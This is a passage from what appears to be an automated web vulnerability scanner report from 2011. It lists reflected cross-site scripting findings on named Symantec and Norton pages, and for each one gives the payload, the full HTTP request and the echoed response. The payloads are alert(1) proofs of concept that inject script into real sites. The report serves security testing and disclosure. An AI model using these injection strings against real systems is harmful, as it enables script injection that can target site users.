Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Servlet/3.0; JBossAS-6
Content-Length: 1328
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
       <!-- so that relative references will use absolute url from jsp
                   and not from calling
...[SNIP]...
<br/>
QUERY:11807--><script>alert(1)</script>5053ee4c92a=1
<br/>
...[SNIP]...

3.25. https://renewals.symantec.com/renewals/application [entry_point parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/application

Issue detail

The value of the entry_point request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96f20"%3balert(1)//6e6ee0889dd was submitted in the entry_point parameter. This input was echoed as 96f20";alert(1)//6e6ee0889dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(1)//6e6ee0889dd&inid=us_pagenotfound_smb_store HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:32:03 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(1)//6e6ee0889dd&inid=us_pagenotfound_smb_store
Content-Length: 21464

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />


<!-- BEGIN
...[SNIP]...
= "null";
var cookieDays = 20;
var idVisitor = "null";
if (idVisitor != "null") {
   s_2.visitorID = idVisitor;
   s_2.visitorID = s_2.visitorID.replace("-", "_hyphen_");
}
s_2.campaign="WEB_sym_lrc96f20";alert(1)//6e6ee0889dd";
if (s_2.campaign == "null")
   s_2.campaign = "WEB";
s_2.currency="USD";
var friendlyEvents = "";
if (emailSent == "Y") {
   if (s_2.campaign != "null") {
       var r_email = s_2.getValOnce(s_2.campa
...[SNIP]...

3.26. http://updatecenter.norton.com/ [NUCLANG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://updatecenter.norton.com
Path:   /

Issue detail

The value of the NUCLANG request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5366c"style%3d"x%3aexpression(alert(1))"0c17ca574c1 was submitted in the NUCLANG parameter. This input was echoed as 5366c"style="x:expression(alert(1))"0c17ca574c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?NUCLANG=en5366c"style%3d"x%3aexpression(alert(1))"0c17ca574c1 HTTP/1.1
Host: updatecenter.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 09 Sep 2011 21:46:07 GMT
Connection: close
Content-Length: 25501


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir = "ltr">
<head id="ctl00_Head1"><t
...[SNIP]...
<input type="hidden" id="LangSelected" value="en5366c"style="x:expression(alert(1))"0c17ca574c1" />
...[SNIP]...

3.27. http://www.symantec.com/business/verisign/fraud-detection-service [tid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /business/verisign/fraud-detection-service

Issue detail

The value of the tid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ed59"><script>alert(1)</script>0e8182bf4be was submitted in the tid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /business/verisign/fraud-detection-service?tid=gnps6ed59"><script>alert(1)</script>0e8182bf4be HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621646660-New%7C1336357646660%3B%20event69%3Devent69%7C1336357646662%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/4

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 54792
Cache-Control: public, max-age=3563
Date: Fri, 09 Sep 2011 21:31:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Risk-Based Authentication, Fraud Detection, Identity Theft Protection - Veri
...[SNIP]...
<meta name="om.page_name" content="en/us: biz: products: overview: information risk &amp; compliance: verisign identity protection fraud detection service: gnps6ed59"><script>alert(1)</script>0e8182bf4be"/>
...[SNIP]...

3.28. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2722'-alert(1)-'9a6003db3b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sitesc2722'-alert(1)-'9a6003db3b/default/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:22 +0000
Vary: Cookie
ETag: "1315604062"
Content-Type: text/html; charset=utf-8
Content-Length: 29479
X-Varnish: 1369354182
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:34:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sitesc2722'-alert(1)-'9a6003db3b/default/themes/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

3.29. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ee12'-alert(1)-'de74577dedc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default4ee12'-alert(1)-'de74577dedc/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:27 +0000
Vary: Cookie
ETag: "1315604067"
Content-Type: text/html; charset=utf-8
Content-Length: 29480
X-Varnish: 1921330105
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:34:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default4ee12'-alert(1)-'de74577dedc/themes/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

3.30. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ecbc'-alert(1)-'1d8cd1c6f5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes6ecbc'-alert(1)-'1d8cd1c6f5f/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:33 +0000
Vary: Cookie
ETag: "1315604073"
Content-Type: text/html; charset=utf-8
Content-Length: 29480
X-Varnish: 1921330192
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:34:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes6ecbc'-alert(1)-'1d8cd1c6f5f/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

3.31. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdc09'-alert(1)-'d98c9c18875 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2bdc09'-alert(1)-'d98c9c18875/images/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:39 +0000
Vary: Cookie
ETag: "1315604079"
Content-Type: text/html; charset=utf-8
Content-Length: 29480
X-Varnish: 1921330249
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:34:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2bdc09'-alert(1)-'d98c9c18875/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

3.32. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55f45'-alert(1)-'cc1ecd4f4c2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2/images55f45'-alert(1)-'cc1ecd4f4c2/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:45 +0000
Vary: Cookie
ETag: "1315604085"
Content-Type: text/html; charset=utf-8
Content-Length: 29481
X-Varnish: 1369354450
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:34:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images55f45'-alert(1)-'cc1ecd4f4c2/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

3.33. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be710'-alert(1)-'6137fcbfa0a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2/images/favicon.icobe710'-alert(1)-'6137fcbfa0a HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:52 +0000
Vary: Cookie
ETag: "1315604092"
Content-Type: text/html; charset=utf-8
Content-Length: 29481
X-Varnish: 1369354548
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=1794
Date: Fri, 09 Sep 2011 21:34:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
